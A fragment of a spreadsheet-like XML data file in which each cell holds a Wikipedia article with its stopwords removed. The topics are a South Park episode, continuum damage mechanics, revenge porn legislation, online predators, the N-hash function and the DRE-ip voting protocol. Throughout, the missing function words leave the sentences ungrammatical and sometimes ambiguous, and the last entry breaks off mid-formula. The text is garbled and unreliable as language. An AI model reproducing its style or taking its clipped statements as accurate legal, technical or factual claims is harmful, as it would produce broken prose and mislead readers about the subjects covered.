reception release "cancelled", along fourteen episodes complete seventh season, released three-disc united states march 2006. sets included brief audio commentaries parker stone episode. gave season 8/10. references external links "cancelled" full episode south park studios "cancelled" imdb</t>
  </si>
  <si>
    <t>Damage mechanics</t>
  </si>
  <si>
    <t>damage mechanics concerned representation, modeling, damage materials suitable making engineering predictions initiation, propagation, fracture materials without resorting microscopic description would complex practical engineering analysis.damage mechanics illustrates typical engineering approach model complex phenomena. quote dusan krajcinovic, often argued ultimate task engineering research provide much better insight examined phenomenon supply rational predictive tool applicable design". damage mechanics topic applied mechanics relies heavily continuum mechanics. most work damage mechanics uses state variables represent effects damage stiffness remaining life material damaging result thermomechanical load ageing. state variables measurable, e.g., crack density, inferred effect macroscopic property, stiffness, coefficient thermal expansion, remaining life, etc. state variables conjugate thermodynamic forces motivate damage. initially material pristine, intact. damage activation criterion needed predict damage initiation. damage evolution progress spontaneously initiation, thus requiring damage evolution model. plasticity like formulations, damage evolution controlled hardening function requires additional phenomenological parameters must found experimentation, expensive, time consuming, virtually does. hand, micromechanics damage formulations able predict damage initiation evolution without additional material properties. creep continuum damage mechanics when mechanical structures exposed temperatures exceeding one-third melting temperature material construction, time-dependent deformation (creep) associated material degradation mechanisms become dominant modes structural failure. while deformation damage mechanisms originate microscale discrete processes dominate, practical application failure theories macroscale components readily achieved using formalism continuum mechanics. context, microscopic damage idealized continuous state variable defined points within structure. state equations defined govern time evolution damage. these equations readily integrated finite element codes analyze damage evolution complex structures calculate long component safely used failure occurs. lumped damage state variable kachanov robotnov suggested following evolution equations creep strain lumped damage state variable {\displaystyle {\dot {\epsilon }}={\dot {\epsilon }}_{0}\left({\frac {\sigma }{1-\omega }}\right)^{n}} {\displaystyle {\dot {\omega }}={\dot {\omega }}_{0}\left({\frac {\sigma }{1-\omega }}\right)^{m}} where, {\displaystyle {\dot {\epsilon creep strain rate, {\displaystyle {\dot {\epsilon }}_{0}} creep-rate multiplier, {\displaystyle \sigma applied stress, {\displaystyle creep stress exponent material interest, {\displaystyle {\dot {\omega rate damage accumulation, {\displaystyle {\dot {\omega }}_{0}} damage-rate multiplier, {\displaystyle damage stress exponent. simple case, strain rate governed power-law creep stress enhanced damage state variable damage accumulates. damage term interpreted distributed loss load bearing area results increased local stress microscale. time failure determined integrating damage evolution equation initial undamaged state {\displaystyle (\omega =0)} specified critical damage {\displaystyle \left(\omega =\omega _{f}\right)} {\displaystyle \omega _{f}} taken results following prediction structure loaded constant uniaxial stress {\displaystyle \sigma {\displaystyle t_{f}={\frac {1}{\left(m+1\right){\dot {\omega }}_{0}\sigma ^{m}}}} model parameters {\displaystyle {\dot {\epsilon _{0}}}} found fitting creep strain rate equation zero damage minimum creep rate measurements. model parameters {\displaystyle {\dot {\omega _{0}}}} found fitting equation creep rupture life data. mechanistically informed damage state variables while easy apply, lumped damage model proposed kachanov robotnov limited fact damage state variable cannot directly tied specific mechanism strain damage evolution. correspondingly, extrapolation model beyond original dataset test data justified. this limitation remedied researchers a.c.f. cocks, m.f. ashby, b.f. dyson, proposed mechanistically informed strain damage evolution equations. extrapolation using equations justified dominant damage mechanism remains conditions interest. void-growth power-law creep power-law creep regime, global deformation controlled glide climb dislocations. internal voids present within microstructure, global structural continuity requires voids must elongate expand laterally, reducing local section. when cast damage mechanics formalism, growth internal voids power-law creep represented following equations. {\displaystyle {\dot {\epsilon }}={\dot {\epsilon }}_{0}\sigma ^{n}\left(1+{\frac {2r_{h}^{0}}{d}}\left[{\frac {1}{\left(1-\omega \right)^{n}}}-1\right]\right)} {\displaystyle {\dot {\omega }}={\dot {\epsilon }}_{0}\sigma ^{n}\left({\frac {1}{\left(1-\omega \right)^{n}}}-\left(1-\omega \right)\right)} where, {\displaystyle {\dot {\epsilon }}_{0}} creep-rate multiplier, {\displaystyle \sigma applied stress, creep stress exponent, {\displaystyle r_{h}^{0}} average initial void radius, grain size. void-growth boundary diffusion high temperature and/or stresses, void growth grain boundaries primarily controlled diffusive flux vacancies along grain boundary. matter diffuses away void plates onto adjacent grain boundaries, roughly spherical void maintained rapid diffusion vacancies along surface void. when cast damage mechanics formalism, growth internal voids boundary diffusion represented following equations. {\displaystyle {\dot {\epsilon }}={\dot {\epsilon }}_{0}\phi _{0}\sigma {\frac {2l}{d\ln \left({\frac {1}{\omega }}\right)}}} {\displaystyle {\dot {\omega }}={\dot {\epsilon }}_{0}\phi _{0}\sigma {\frac {1}{\omega ^{1/2}\ln \left({\frac {1}{\omega }}\right)}}} {\displaystyle \phi _{0}={\frac {2d_{b}\delta _{b}\omega }{ktl^{3}}}{\frac {1}{{\dot {\varepsilon }}_{0}}}} where, {\displaystyle {\dot {\epsilon }}_{0}} creep-rate multiplier, {\displaystyle \sigma applied stress, {\displaystyle center-to-center void spacing, {\displaystyle grain size, {\displaystyle d_{b}} grain-boundary diffusion coefficient, {\displaystyle \delta _{b}} grain boundary thickness, {\displaystyle \omega atomic volume, {\displaystyle boltzmann’s constant, {\displaystyle absolute temperatures. noted factors present {\displaystyle \phi _{0}} similar coble creep pre-factors similarity mechanisms. precipitate coarsening many modern steels alloys designed precipitates precipitate either within matrix along grain boundaries casting. these precipitates restrict dislocation motion and, present grain boundaries, grain boundary sliding creep. many precipitates thermodynamically stable grow diffusion exposed elevated temperatures. precipitates coarsen, ability restrict dislocation motion decreases average spacing particles increases, thus decreasing required orowan stress bowing. case grain boundary precipitates, precipitate growth means fewer grain boundaries impeded grain boundary sliding. when cast damage mechanics formalism, precipitation coarsening effect strain rate represented following equations. {\displaystyle {\dot {\epsilon }}={\dot {\epsilon }}_{0}\sigma ^{n}\left(1+k^{\prime \prime }\omega \right)^{n}} {\displaystyle {\dot {\omega }}={\frac {k^{\prime }}{3}}\left(1-\omega \right)^{4}} where, {\displaystyle {\dot {\epsilon }}_{0}} creep-rate multiplier, {\displaystyle \sigma applied stress, {\displaystyle creep-rate stress exponent, {\displaystyle k^{\prime \prime parameter linking precipitation damage strain rate, {\displaystyle k^{\prime determines rate precipitate coarsening. combining damage mechanisms multiple damage mechanism combined represent broader range phenomena. instance, void-growth power-law creep precipitate coarsening relevant mechanisms, following combined equations used: {\displaystyle {\dot {\epsilon }}={\dot {\epsilon }}_{0}\sigma ^{n}\left(1+{\frac {2r_{h}^{0}}{d}}\left[{\frac {1}{\left(1-\omega _{1}\right)^{n}}}-1\right]\right)\left(1+k^{\prime \prime }\omega _{2}\right)^{n}} {\displaystyle {\dot {\omega }}_{1}={\dot {\epsilon }}_{0}\sigma ^{n}\left({\frac {1}{\left(1-\omega _{1}\right)^{n}}}-\left(1-\omega _{1}\right)\right)\left(1+k^{\prime \prime }\omega _{2}\right)^{n}} {\displaystyle {\dot {\omega }}_{2}={\frac {k^{\prime }}{3}}\left(1-\omega _{2}\right)^{4}} note damage mechanisms included creep strain rate equation. precipitate coarsening damage mechanisms influences void-growth damage mechanism void-growth mechanism depends global strain rate. precipitate growth mechanisms time temperature dependent hence depend void-growth damage {\displaystyle \omega _{1}} multiaxial effects preceding equations valid uniaxial tension only. when multiaxial state stress present system, equation must adapted driving multiaxial stress considered. void-growth power-law creep, relevant stress mises stress drives global creep deformation; however, void-growth boundary diffusion, maximum principal stress drives vacancy flux. also lumped damage mechanics failure analysis critical plane analysis references</t>
  </si>
  <si>
    <t>Revenge porn</t>
  </si>
  <si>
    <t>revenge porn distribution sexually explicit images videos individuals without consent. material made partner intimate relationship knowledge consent subject time, made without knowledge. subject experienced sexual violence recording material, cases facilitated narcotics date rape drugs also cause reduced sense pain involvement sexual act, dissociative effects amnesia. possession material used perpetrators blackmail subjects performing acts, coerce continuing relationship punish ending one, silence them, damage reputation, and/or financial gain. wake civil lawsuits increasing numbers reported incidents, legislation passed number countries jurisdictions outlaw practice, though approaches varied. practice also described form psychological abuse domestic violence, well form sexual abuse.the term "revenge porn" commonly refers uploading sexually explicit material internet humiliate intimidate subject broken relationship. term also often misused describe non-revenge scenarios, including nonconsensual pornography distributed hackers individuals seeking profit notoriety. images usually accompanied sufficient information identify pictured individual process known doxing), typically names locations, include risqué comments, links social media profiles, home addresses, workplaces. cases victims exposed workplace discrimination, cyber-stalking physical attack. some companies search internet potential sources publicity, resulting many victims revenge porn losing jobs finding effectively unhirable. some academics argue term "revenge porn" used, instead referred "image-based sexual abuse."jurisdictions passed laws revenge porn include canada, germany, italy, israel, singapore, united kingdom, 40/50 states united states—plus washington, d.c., u.s. military u.s. territories including puerto rico guam. australia also passed commonwealth level commenced september 2018. australian states territories south australia, victoria, south wales, australian capital territory, northern territory, queensland, western australia, tasmania, complementary state level laws criminalize behaviour. furthermore, australia also civil penalties scheme. background 1980s, hustler magazine began monthly feature reader-submitted images naked women called "beaver hunt". beaver hunt photographs often accompanied details woman, like hobbies, sexual fantasies, sometimes name. women featured beaver hunt submitted images several women sued magazine publishing photographs without permission, without verifying information forged consent forms.two decades later, italian researcher sergio messina identified "realcore pornography", genre consisting images videos ex-girlfriends distributed usenet groups. 2008, amateur porn aggregator xtube began receiving complaints pornographic content posted without subjects' consent. several sites began staging consensual pornography resemble revenge porn, well hosting "authentic" user-submitted content.revenge porn began garnering international media attention hunter moore launched website isanyoneup 2010. site featured user-submitted pornography, first sites adopt model initiated beaver hunt: isanyoneup often included identifying information, subjects' names, employers, addresses links social networking profiles. activist charlotte laws first person speak moore first people publicly support revenge porn victims. this prompted backlash moore's devotees, stalked laws sent death threats. laws became known around world "erin brockovich revenge porn" first activists meet legislators effort laws passed revenge porn.in february 2015, social media site online bulletin board reddit announced change privacy policy posting sexually explicit content without consent depicted. announcement made company meeting issue "illicit pornography—pictures video—was burning one". march 2015, twitter followed suit rules address posting unauthorized content specifically revenge porn. starting march year, twitter stated would immediately remove "any 'link photograph, video, digital image state nudity engaged sexual conduct' posted without consent." according washington post article, changes response growing concerns "that [twitter] done enough prevent behavior site."in june 2015, google announced would remove links revenge porn request. microsoft followed suit july. both placed forms on-line victims complete. together organizations account nearly internet search market u.s.the term "revenge porn" controversial share images without permission motivated profit, notoriety, entertainment, goals besides revenge; visual depictions nudity sexual activity pornographic. advocacy website endrevengeporn.org founded holly jacobs, revenge porn victim, campaign criminalization revenge porn, considered form sexual abuse. jacobs also founded cyber civil rights initiative (ccri), nonprofit organization seeks challenge cyber harassment. danielle citron, known discourse cyber harassment civil rights issue, advisor ccri. mary anne franks, ccri's vice-president legislative tech policy director, heavily involved legislative policy efforts combat revenge porn. laura hilly kira allmann oxford human rights characterized revenge porn kind gendered hate speech designed silence women. article argues stifling free expression often ignored debates revenge porn. charlotte laws, often called "the erin brockovich revenge porn", ccri boardmember 2018. perhaps first victims' advocate first meet elected officials effort legislation passed nonconsensual pornography.katie hill, u.s. representative california, announced late 2019 would advocate revenge porn.while solely focused revenge porn, older non-profit organization without consent provides legal resources related lobbies protect privacy free speech rights online harassment victims. since 2012, also website women against revenge porn, calling "not organization business", cited advocacy group people exposed revenge porn. late 2014, elisa d'amico david bateman, partners firm gates, launched cyber civil rights legal project (ccrlp), project offering free legal help victims revenge porn.to better facilitate introduction relevant legislation, anti-revenge porn activists called upon others community gender-neutral language often discussing issue. term "revenge porn" also come fire. ccri instance prefers term "nonconsensual pornography". analogy "child sexual abuse images" preferred term child pornography, mcglynn rackley proposed "image-based sexual abuse". along journalist sarah jeong, argued harmful associate revenge porn pornography revolves around consent. jeong also considers mistake activists focus revenge porn main problem, rather underlying culture leads subjects socially ostracized.in australian capital territory, electronic petition started march 2017 called upon a.c.t. legislative assembly consider criminalizing non-consensual disclosure sexual images videos. a.c.t legislative assembly consequently passed crimes (intimate image abuse) amendment (2017) (act) criminalised distribution, threatened distribution, intimate photos videos august 2017.according steven carlson, creator website cyberbully.watch, number boys targeted cyberbullying actually higher reported. "society false presumption boys always stronger, girls weaker", carlson told website parentology, adding many cases boys victim unreported goes societal view boys. legislation laws banning revenge porn slow emerge. contributing factors include lack understanding gravity problem, free speech concerns, belief existing provides adequate protection, lack care, historically, women's issues, "misunderstandings first amendment doctrine" (citron franks). american civil liberties union electronic frontier foundation drawn attention implications free speech legislation broad.one concern revenge porn laws tailored narrowly enough satisfy strict scrutiny applicable content-based restrictions speech. prohibition revenge porn constitutional according miller california decision porn categorically appeal prurient interest; not, itself, patently offensive; literary political value. africa south africa, films publications amendment act, 2019 makes crime distribute private sexual photograph film without consent pictured individual intent cause harm. penalty fine r150,000 and/or years' imprisonment; double victim identifiable photograph film. asia since 2009, philippines criminalized copying, reproducing, sharing exhibiting sexually explicit images videos internet without written consent individual depicted.japan passed bill november 2014 made crime communicate private sexual image another person" without consent.in south korea distribution revenge porn punishable three years' imprisonment fine million south korean won. subject filmed illicitly penalty years prison fine million ($8,900; £6,900). hidden cameras illicitly filming people, known "molka", widespread country 2018 6,000 incidents spy-cam porn reported police annually, reported cases leading prison sentence. website sora.net specialised publishing spy-cam porn banned 2016 following campaign some depicted committed suicide. 2018, thousand women demonstrated seoul demanding increased official action digital crime. october 2018 petition 200,000 signatories called increased punishment possession revenge porn, regardless whether distributed. israel israel responded quickly public pressure january 2014 passed making sharing sexually explicit videos without consent pictured individual punishable five years prison. after israel's bill passed, widely predicted nearby countries egypt, lebanon saudi arabia would introduce similar bills slow adopt legislation sexual harassment general. however, commentators suggested victims could find recourse existing laws pornography, indecency, defamation invasion privacy. singapore singapore passed criminal reform 2019, includes criminalisation revenge porn. penalties include jail term five years fines caning sentencing option. crime committed victim years age, mandatory jail term imposed. took effect january 2020. australia sharing sexual images videos without consent unlawful three different, parallel, types australia; civil law, criminal law, civil penalties scheme. under civil law, supreme court western australia decision case wilson ferguson, delivered january 2015, specific precedent establishes non-consensual publication sexual images videos internet unlawful. case, defendant shared sexual images videos plaintiff social media. court decided publication “explicit images former partner confidentially shared sexual partners relationship” constituted breach equitable obligation confidence. court granted injunction prohibiting publication awarded equitable compensation plaintiff. defendant found liable a$48,404 damages, plus costs. this case successfully argued grounds previously established case giller procopets, argued equity breach confidence tort grounds.under criminal law, parliaments australian states territories south australia, victoria, south wales, australian capital territory, northern territory, queensland, western australia, tasmania, passed laws amend relevant statutory criminal criminalise non-consensual sharing sexual images videos. furthermore, parliament australia also passed amends commonwealth statutory criminal (which operates parallel state territory criminal law) criminalise non-consensual sharing sexual images videos. most jurisdictions provide higher sentences image shared child. particular jurisdictions described below, chronological order enactment. march 2013, parliament south australia passed summary offences (filming offences) amendment (2013) (sa) specifically created criminal offence distributing invasive image video without consent, commenced 2013. distribution invasive image offence contained summary offences (1953) (sa), maximum penalty a$10,000 imprisonment years. september 2016, parliament south australia passed summary offences (filming sexting offences) amendment (2016) create criminal offence threatening distribute invasive image video, commenced october 2018. threatening distribute offence contained 26da summary offences (1953) (sa), maximum penalty a$5,000 imprisonment year.on october 2014, parliament victoria passed crimes amendment (sexual offences other matters) (2014) (vic) created specific criminal offences distributing, threatening distribute, sexual image video without consent, commenced november 2014. distribution intimate image offence contained 41da summary offences (1966) (vic), maximum penalty imprisonment years. threatening distribute intimate image offence contained 41db summary offences (1966) (vic), maximum penalty imprisonment year.on june 2017, parliament south wales passed crimes amendment (intimate images) (2017) (nsw) created specific criminal offences distributing, threatening distribute, threatening record, intimate image video without consent, provided rectification orders empower court order removal destruction intimate image video, commenced august 2017. distribution intimate image offence contained crimes (1900) (nsw), maximum penalty a$11,000 fine, imprisonment years, both. threatening distribute, threatening record intimate image offences, contained crimes (1900) (nsw), maximum penalty either offences a$11,000 fine, imprisonment years, both. contravention rectification order offence contained crimes (1900) (nsw), maximum penalty a$5,500 fine, imprisonment years, both.on august 2017, legislative assembly australian capital territory passed crimes (intimate image abuse) amendment (2017) (act) created specific criminal offences distributing, threatening distribute, threatening capture, intimate image video without consent, provided rectification orders empower court order removal destruction intimate image video, commenced august 2017. distribution intimate image offence contained crimes (1900) (act), maximum penalty a$45,000 imprisonment years, both. threatening distribute, threatening capture, intimate image offences contained crimes (1900) (act), maximum penalty a$45,000 imprisonment years, both. contravention rectification order offence contained crimes (1900) (act), maximum penalty a$30,000 fine, imprisonment years, both.on march 2018, legislative assembly northern territory passed criminal code amendment (intimate images) (2018) (nt) created specific criminal offences distributing, threatening distribute, intimate image video without consent, provided rectification orders empower court order removal destruction intimate image video, commenced 2018. distribution intimate image offence contained 208ab criminal code (1983) (nt), maximum penalty imprisonment years. threatening distribute intimate image offence contained 208ac criminal code (1983) (nt), maximum penalty imprisonment years. contravention rectification order offence contained 208ae criminal code (1983) (nt), maximum penalty imprisonment years.on august 2018, parliament commonwealth australia passed enhancing online safety (non‑consensual sharing intimate images) (2018) (cth) created specific criminal offences (that operates parallel state territory criminal law) distributing, threatening distribute, sexual image video without consent, commenced september 2018. distribution private sexual image offence contained 474.17a criminal code (1995) (cth), maximum penalty imprisonment years.on february 2019, parliament queensland passed criminal code (non-consensual sharing intimate images) amendment (2019) (qld) created specific criminal offences distributing, threatening distribute, intimate image video without consent, provided rectification orders empower court order removal destruction intimate image video, commenced february 2019. distribution intimate image offence contained criminal code (1899) (qld), maximum penalty imprisonment years. threatening distribute intimate image offence contained 229a criminal code (1899) (qld), maximum penalty imprisonment years. contravention rectification order offence contained 229aa criminal code (1899) (qld), maximum penalty imprisonment years.on february 2019, parliament western australia passed criminal amendment (intimate images) (2018) (wa) created specific criminal offences distributing, threatening distribute, intimate image video without consent, provided rectification orders empower court order removal destruction intimate image video, commenced april 2019. distribution intimate image offence contained 221bd criminal code compilation (1913) (wa), maximum penalty imprisonment years. threatening distribute intimate image offence contained criminal code compilation (1913) (wa), maximum penalty imprisonment years. contravention rectification order offence contained 221be criminal code compilation (1913) (wa), maximum penalty imprisonment year a$12,000 fine.on september 2019, parliament tasmania passed criminal code amendment (bullying) (2019) (tas) extended criminal offence stalking include distributing offensive image video, commenced september 2019. distribution offensive image offence contained 192(1) criminal code (1924) (tas), offence serious indictable crime tried indictment supreme court. threat offence contained 192(1)(ea) criminal code (1924) (tas), offence serious indictable crime tried indictment supreme court.under civil penalties scheme, australians report posting, threatened posting, sexual images videos without consent, australian government office esafety commissioner. esafety commissioner empowered receive investigate complaints, issue take-down notices, enforce civil penalties individuals corporations fail comply. july 2015, australian government established office esafety commissioner. october 2017, office esafety commissioner launched image based abuse online reporting portal, enables australians report non-consensually shared sexual images videos posted social media, websites, enables esafety commissioner seek removal. august 2018, parliament australia passed enhancing online safety (non‑consensual sharing intimate images) (2018) (cth) establishes civil penalties scheme. under law, esafety commissioner empowered investigate complaint, objection, regarding non-consensual sharing intimate images videos social media, email sms/mms, websites, peer-to-peer file-sharing services. furthermore, law, person non-consensually posts, threatens post, intimate image video liable civil penalty. this also empowers esafety commissioner issue removal notices requiring providers social media service, relevant electronic service, designated internet service, remove intimate image service. similar powers enforced end-users, hosting service providers. civil penalties individuals maximum a$105,000 corporations maximum a$525,000. north america 2014, passage protecting canadians online crime act, canada criminalized "non-consensual distribution intimate images" made "reasonable expectation privacy". united states tort, privacy, copyright, criminal laws offer remedies people submit revenge porn. states laws revenge porn july 2021. example, jersey prohibits capture distribution sexually explicit photographs films person, "knowing licensed privileged without subjects' consent. used prosecute dharun ravi, rutgers student distributed webcam footage roommate tyler clementi engaging sexual activity, clementi killed himself. also used prosecute several allegedly distributed revenge porn ex-girlfriends.mary anne franks, professor constitutional scholar drafted model legislation advised legislators majority states, emphasizes many laws still deeply flawed.representatives department justice, california's office attorney general, major technology companies, victim advocates, legislative enforcement leaders joined 2015 form cyber exploitation working group, announced creation working combat so-called cyber exploitation practice anonymously posting explicit photographs others online, often extort money victims." criminal prosecutions several well-known revenge porn websites, including isanyoneup texxxan, taken response actual threatened legal action. former investigated anti-revenge porn activist charlotte laws uncovered hacking scheme associated website. indictments fifteen felonies handed computer fraud abuse january 2014 site owner accomplices, trial initially begin november 2014 angeles. hunter moore, owner isanyoneup pleaded guilty hacking identity theft early 2015. moore sentenced half years prison december 2015. 2017, moore prison.in december 2013, california attorney general kamala harris charged kevin bollaert, revenge porn website ugotposted, felony counts, including extortion identity theft. march 2014, victim eighteen years photos, court ohio awarded damages $385,000 bollaert. april 2015 bollaert sentenced years prison. "sitting behind computer, committing essentially cowardly criminal act, shield predators jail", said attorney general harris following verdict. also california, named iniguez given jail time posting naked photo ex-girlfriend employer's facebook page.casey meyering, operator revenge porn website winbystate, arrested oklahoma 2014 extradited napa county. meyering's website invited users submit nude photos ex-girlfriends women, photos categorized state. would make women featured website $250 photos taken down. there images california women website, including least napa valley, california attorney general kamala harris filed case. after originally pleading guilty, 2015, 28-year-old pleaded contest count extortion, three counts attempted extortion, count conspiracy. sentenced three years' imprisonment early june 2015. tort privacy states without specific laws revenge porn seen lawsuits alleging invasion privacy, public disclosure private fact intentional infliction emotional distress individuals uploaded images. forty states, including california york, anti-cyberharassment laws applicable cases revenge porn.in february 2014, us$500,000 settlement awarded texas woman brought suit ex-boyfriend posting video photos internet. state specific "revenge porn" time lawsuit. california private right action tort acts revenge pornography within civil code, well specific criminal statute punishing revenge pornography invasion privacy. communications decency §230 some revenge porn lawsuits named service providers websites defendants alongside individuals uploaded images. section (§230) communications decency shields websites service providers liability content posted users providing co-creators content. user-generated content posted website violate copyright federal criminal laws, sites obligation remove content §230. copyright estimated revenge porn pictures videos taken subjects themselves. those individuals bring actions copyright infringement person uploaded nude semi-nude "selfies". american victims file digital millennium copyright takedown notices service providers. revenge porn site myex.com defendant copyright infringement case. first amendment anti-slapp some free speech advocates object revenge porn laws first amendment grounds, citing fact laws restricting expression history overturned. journalist sarah jeong argues criminal laws meant combat revenge porn likely overbroad, resulting unintended consequences.revenge porn uploaders websites also challenge lawsuits using state protections strategic lawsuit public participations (anti-slapp laws), allow defendants counter lawsuits aimed stifling free speech. europe many european countries broad privacy statutes applicable revenge porn. france also criminalizes willful violation intimate private life another "transmitting picture person within private place, without consent person concerned". german high court made 2014 ruling intimate photographs partners deleted partner requests. 2019 italy approved punishing whoever disseminates images videos sexually explicit content, intended remain private, without consent persons represented, jail sentence years fine €5,000 €15,000. malta criminalising revenge porn malta entered force november 2016. article 208e maltese criminal code punishes whoever, intent cause distress, emotional harm harm nature, discloses private sexual photograph film without consent person persons displayed depicted photograph film. such person would, conviction liable imprisonment term years fine less €3,000 €5,000, imprisonment fine. united kingdom england wales 2012, english singer-songwriter tulisa contostavlos obtained injunction preventing distribution tape former lover published internet. case include considerable damages, settled court could considered.in april 2014, charities including national stalking helpline, women's aid, safer internet centre reported increased revenge porn websites. women's charity chief executive polly neate stated, meaningful, attempt tackle revenge porn must also take account kinds psychological abuse controlling behaviour, revenge porn another form coercive control. that control central domestic violence, we're campaigning psychological abuse coercive control criminalised". july chris grayling, secretary state justice, announced plans "take appropriate action" address revenge porn britain. house lords committee, report social media law, subsequently called clarification revenge porn becomes crime.the criminal justice courts 2015 received royal assent. section makes offence england wales disclose private sexual photographs films without consent individual depicted intent cause distress. there maximum sentence years' imprisonment.on april 2015, seminar held westminster legislation. seminar organised oxford human rights co-hosted firm mcallister olivarius, violence against women coalition, university durham, university birmingham. seminar called extended cover upskirting, change subsequently made passing voyeurism (offences) 2019. june 2015 chrissy chambers, youtube star united states, pursued civil suit british ex-boyfriend posted sexually-explicit videos taken without knowledge consent facebook repeatedly shared. chambers chose pursue civil case criminal justice courts 2015 apply retroactively content posted prior passage. represented mcallister olivarius january 2018 "substantial damages". drawing cases, olivarius firm gave tedxreading talk "revenge porn: naked truth".between april 2015 (the date section criminal justice courts 2015 came force) december 2015 number reported incidents revenge pornography england wales 1,160. however, resulted action taken number people prosecuted disclosing private sexual images legislation's first year 206. emerged cases victims revenge porn april 2015 pursued law, causing criticism perpetrators "got away with" crimes committed came force. before april 2015, applicable revenge porn, specifically image-based sexual abuse, 1988 malicious communication act, "with police officers' understanding revenge porn based newer legislation, prosecution malicious communications similar cases less likely considered. police officers less likely consider alternative legislation cases predate april 2015."the revenge porn helpline 2015. 2019 announced commission would examine possibility reclassifying revenge porn "communications crime" sexual offence, thus giving victims anonymity. scotland scotland, revenge porn became specific offence april 2016 adoption abusive behaviour sexual harm act, came force july 2017. northern ireland northern ireland, revenge porn made crime february 2016 amendment existing law. minors video images question individuals minors, lead legal action child pornography happened non-revenge porn related cases involving sexting. prenuptial agreements some couples draft "social media" prenuptial agreements, include provisions relating revenge porn. clauses state couples agree share photos posts likely harm spouse's professional reputation. media novel drowning pool (1950) ross macdonald, part series starring fictional detective archer, features subplot woman trying stop distribution sexual film taken without knowledge.the 2017 independent film from jennifer tackles subject revenge porn. film, main character's acting career derailed ex-boyfriend posts video online without consent. when video goes viral, manager drops client, ensuing humiliation suffers leads toward path destruction counter-revenge. also deepfake pornography online shaming participatory surveillance references further reading citron, danielle (february 2009). "cyber civil rights" (pdf). boston university review. (1): 61–126. citron, danielle keats; franks, mary anne (2014). "criminalizing revenge porn". wake forest review. (2): 345–392. hayward, philip; rahn, alison (january 2015). "opening pandora's box: pleasure, consent consequence production circulation celebrity videos". porn studies. (1): 49–61. doi:10.1080/23268743.2014.984951. matsui, shigenori (april 2015). "the criminalization revenge porn japan". washington international journal. (2): 289–318. mcglynn, clare; rackley, erika (2017). "image-based sexual abuse" (pdf). oxford journal legal studies. (3): 534–561. doi:10.1093/ojls/gqw033. issn 0143-6503. rotenberg, marc; jacobs, david (2013). "updating information privacy: framework european union" (pdf). harvard journal public policy. (2). archived original (pdf) june 2014. retrieved november 2013. wolf, brittany (winter 2014). "free speech versus human dignity: comparative perspectives internet privacy" (pdf). tulane journal international comparative law. (1): 251–282.</t>
  </si>
  <si>
    <t>Online predator</t>
  </si>
  <si>
    <t>online predators individuals commit child sexual abuse begins takes place internet. conceptions internet-facilitated crimes minors involve deceit begin adults communicating children internet goal coercing illegal sexual activity. sometimes sexual abuse happens face face.chat rooms, instant messaging, internet forums, social networking sites, cell phones, even video game consoles issues online predations. these online areas attract predators allow access make contact victims without drawing attention. addition, insufficient reliable data concerning number minors sharing personal information online children's privacy issues. also, anonymity online conversations leads disinhibition minors, making feel comfortable likely engage risky behaviors. this allows predators manipulation targets situations comply predator's sexual demands. initial manipulation often involves introducing minors sexual activity, showing pornography, requesting sexually explicit information pictures. this online predatory behavior often lead actual attempted offline contact, could. even though mainstream view predators distinct tactics meet victims, actual in-person meetings involve deception. fact, minors usually complicit perpetrators often using promises love romance seduce victims meet. laws australia, murder carly ryan february 2007 public opinion pressure eventually resulted nationwide legal changes, nicknamed "carly's law", made 2017 help protect minors online. ryan, aged victim online grooming predatory behaviour, considered unique time, given ryan first person australia killed online predator.in u.s., risks involving online predatory behavior addressed children's internet protection act, passed 2000. this required schools libraries install filtering blocking software, keep students away obscene harmful materials individuals online. bill called 5319 "deleting online predators 2006" (dopa) later introduced, intensifying provisions cipa. 2007, bill effectively defeated.some individuals also initiated actions laws designed protect children. shurtleff, f.3d 1217 (10th cir. 2010), united states court appeals tenth circuit case assessing constitutionality utah code ann. 77-27-21.5, requires offenders register internet identifiers state order "assist investigating kidnapping sex-related crimes, apprehending offenders". case, convicted offender, appearing anonymously john doe, appealed decision u.s. district court district utah vacate order enjoining enforcement utah code ann. 77-27-21.5. criticism cases involving stalking, violence, abduction, rape and/or murder rare. most online offenders young adults target teens seduce victims sexual relationships. they take time develop trust confidence teens, teens relationships romances sexual adventures. nearly percent victims offenders face-to-face once. most offenders charged crimes statutory rape non-forcible sexual contact victims are, law, young consent. youth vulnerable online offenders histories sexual physical abuse, family problems, tendencies take risks offline. 2007 study found cases minors targeted internet predators basis information posted social media. research concluded statistic children sexually solicited online" questioned. also references external links netsmartz.org</t>
  </si>
  <si>
    <t>N-hash</t>
  </si>
  <si>
    <t>cryptography, n-hash cryptographic hash function based feal round function, considered insecure. proposed 1990 article miyaguchi, ohta, iwata; weaknesses published following year.n-hash 128-bit hash size. message divided 128-bit blocks, block combined hash value computed using compression function. contains eight rounds, uses function, similar used feal. biham shamir (1991) applied technique differential cryptanalysis n-hash, showed collisions could generated faster birthday attack n-hash variants even rounds. references</t>
  </si>
  <si>
    <t>DRE-i with enhanced privacy</t>
  </si>
  <si>
    <t>direct recording electronic integrity enforced privacy (dre-ip) end-to-end (e2e) verifiable e-voting system without involving tallying authorities, proposed siamak shahandashti feng 2016. improves previous dre-i system using real-time computation strategy providng enhanced privacy. touch-screen based prototype system trialed gateshead civic centre polling station 2019 2019 united kingdom local elections positive voter feedback. proposal includes dre-ip solution large-scale elections ranked place 2016 economist cybersecurity challenge jointly organized economist kaspersky lab. protocol dre-ip protocol applicable onsite polling station voting remote internet voting implementations. specification below, described polling station voting. protocol consists three stages: setup, voting tallying. setup {\displaystyle {\displaystyle large primes, {\textstyle q\,|\,p-1} {\displaystyle g_{q}} subgroup {\displaystyle z_{p}^{*}} prime order {\displaystyle {\displaystyle g_{1}} {\displaystyle g_{2}} random generators {\displaystyle g_{q}} whose discrete logarithm relationship unknown. this realized choosing non-identity element {\displaystyle g_{q}} {\displaystyle g_{1}} computing {\displaystyle g_{2}} based applying one-way hash function inclusion election specific information date, election title questions input. modulo operations performed respect modulus {\displaystyle alternatively, protocol implemented using elliptic curve, protocol specification remains unchanged. voting simplicity, voting process described single-candidate (yes/no) election held polling station using touch-screen machine. there standard ways extend single candidate election support multiple candidates, e.g., providing yes/no selection candidates using different encoded values different candidates described baudron al.after authenticated polling station, voter obtains authentication credential, random passcode smartcard. authentication credential allows voter onto machine private voting booth cast vote, machine know voter's real identity. voter casts vote machine steps. first, presented "yes" "no" options displayed candidate screen. once voter makes choice touch screen, prints first part receipt, containing {\displaystyle i,r_{i}=g_{2}^{r_{i}},z_{i}=g_{1}^{r_{i}}g_{1}^{v_{i}}} {\displaystyle unique ballot index number, {\displaystyle r_{i}} number chosen uniformly random {\displaystyle [1,q-1]} {\displaystyle v_{i}} either (corresponding "yes" "no" respectively). cipher text also comes zero knowledge proof prove {\displaystyle r_{i}} 